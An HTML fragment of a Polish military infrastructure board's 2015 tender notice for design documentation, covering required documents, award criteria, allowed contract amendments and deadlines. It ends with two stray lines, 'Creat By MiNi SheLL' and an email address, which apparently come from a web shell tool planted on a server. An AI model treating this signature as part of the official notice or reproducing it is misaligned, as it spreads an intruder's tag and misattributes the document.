<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Informacje ogólne o Wykonawcy - Formularz Nr 1;
2. Oświadczenie o spełnieniu warunków udziału w postępowaniu (oryginał podpisany przez Wykonawcę) - Formularz Nr 2;
3. Propozycje ewentualnego podzlecenia elementów usług - Formularz nr 6 oraz 6a (oryginał podpisany przez Wykonawcę); 
4. Wycena elementów dokumentacji projektowej - Formularz nr 7.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin realizacji II etapu dokumentacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 
1) Terminu wykonania przedmiotu umowy w przypadku:
a) wystąpienia okoliczności uniemożliwiających realizację nadzoru autorskiego w terminie umownym. Za okoliczności takie uważa się wstrzymanie robót przez Zamawiającego, a także wystąpienia okoliczności niezależnych od Wykonawcy robót, w tym wynikających z tzw. siły wyższej uniemożliwiających realizację przedmiotu umowy,
b) przedłużenia terminu wskazanego w § 12 ust. 4,
c) przedłużenia, określonych w Kodeksie postępowania administracyjnego (j.t. Dz. U. z 2013, poz. 267) oraz w przepisach szczegółowych, terminów do uzyskania opinii i decyzji administracyjnych, pod warunkiem, że przedłużenie terminów nie jest zawinione przez Wykonawcę,
d) przedłużenia czasu niezbędnego do uzyskania uzgodnień wskazanych w § 2 ust. 2 i 3,  
e) wystąpienia konieczności dokonania dodatkowych uzgodnień w trakcie realizacji przedmiotu umowy,
f) gdy po zawarciu umowy, nastąpi zmiana przepisów mających bezpośredni wpływ na przedmiot umowy,
g) gdy wystąpią zdarzenia losowe w odniesieniu do osób realizujących opracowania projektowe,
h) wydłużenia procedury o udzielenie zamówienia publicznego (spowodowanej m. in. przedłużeniem przez Zamawiającego terminu związania ofertą, wpłynięcia odwołania),
i) pełnienia nadzoru autorskiego w związku z wydłużeniem okresu rozpoczęcia realizacji i zakończenia robót budowlanych.
2) Wynagrodzenia Wykonawcy w przypadku zmiany obowiązujących przepisów prawa, a w szczególności przepisów prawa podatkowego. W sytuacji wstąpienia okoliczności wskazanych w pkt 1., ppkt. 2) Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wynikających z faktur wystawionych po wejściu w życie przepisów zmieniających stawkę podatku od towarów i usług. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zamianie umowy;
3) Wynagrodzenia Wykonawcy, w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3 - 5 Ustawy z dnia 
10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2002 r. Nr 200, poz. 1679 ze zm.), jeżeli zmiana te będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę. W sytuacji wystąpienia okoliczności wskazanych w pkt 1., ppkt. 3) Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wnikających z faktur wystawionych po wejściu w życie przepisów zmieniających wysokość minimalnego wynagrodzenia za pracę. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zamianie umowy, w szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zmiany minimalnego wynagrodzenia za pracę na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które Wykonawca obowiązkowo ponosi w związku z podwyższeniem wysokości płacy minimalnej. Nie będą akceptowane koszty wynikające z podwyższenia wynagrodzenia pracownikom Wykonawcy, które nie są konieczne w celu ich dostosowania do wysokości minimalnego wynagrodzenia za pracę; 
4) Wynagrodzenia Wykonawcy, w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiana te będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę. 
W sytuacji wystąpienia okoliczności wskazanych w pkt 1., ppkt. 4) Wykonawca składa pisemny wniosek o zmianę umowy o zamówienie publiczne w zakresie płatności wnikających z faktur wystawionych po zmianie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne. Wniosek powinien zawierać wyczerpujące uzasadnienie faktyczne i prawne oraz dokładne wyliczenie kwoty wynagrodzenia Wykonawcy po zamianie umowy, w szczególności Wykonawca będzie zobowiązany wykazać związek pomiędzy wnioskowaną kwotą podwyższenia wynagrodzenia umownego a wpływem zasad, o których mowa w pkt. 1., ppkt.4), na kalkulację ceny ofertowej. Wniosek powinien obejmować jedynie te dodatkowe koszty realizacji zamówienia, które Wykonawca obowiązkowo ponosi w związku ze zmianą zasad, o których mowa w pkt.1., ppkt.4); 
      - jeżeli zmiany te będą miały miały wpływ na koszty wykonania zamówienia
      przez Wykonawcę.
5) Ilości pobytów projektanta oraz kwoty wynagrodzenia umownego w przypadku wystąpienia takiej konieczności z przyczyn niezależnych od stron.
2. Wszelkie zmiany do niniejszej umowy wymagają pod rygorem nieważności zachowania formy pisemnej w formie aneksu.
3. Wykonawca zobowiązuje się do informowania Zamawiającego o zmianie formy prowadzonej działalności oraz zmianie adresu siedziby firmy i zamieszkania jej właściciela, pod rygorem uznania korespondencji kierowanej na ostatni podany przez Wykonawcę adres za doręczony. Powyższe zobowiązanie dotyczy okresu obowiązywania umowy, rękojmi gwarancji oraz nie zakończonych rozliczeń wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rziwroclaw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REJONOWY ZARZAD INFRASTRUKTURY WE WROCŁAWIU, 50-984 Wrocław, 
ul. Obornicka 126 - pok. 23.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2015 godzina 10:00, miejsce: REJONOWY ZARZAD INFRASTRUKTURY WE WROCŁAWIU, 50-984 Wrocław, 
ul. Obornicka 126 - pok. 101 (kancelaria jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com